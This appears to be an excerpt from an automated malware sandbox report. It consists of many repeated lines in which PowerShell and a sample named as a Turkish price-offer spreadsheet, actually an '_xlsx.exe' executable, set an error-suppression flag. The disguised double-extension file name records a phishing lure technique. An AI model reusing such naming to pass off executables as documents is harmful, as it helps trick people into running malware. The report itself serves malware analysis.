Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
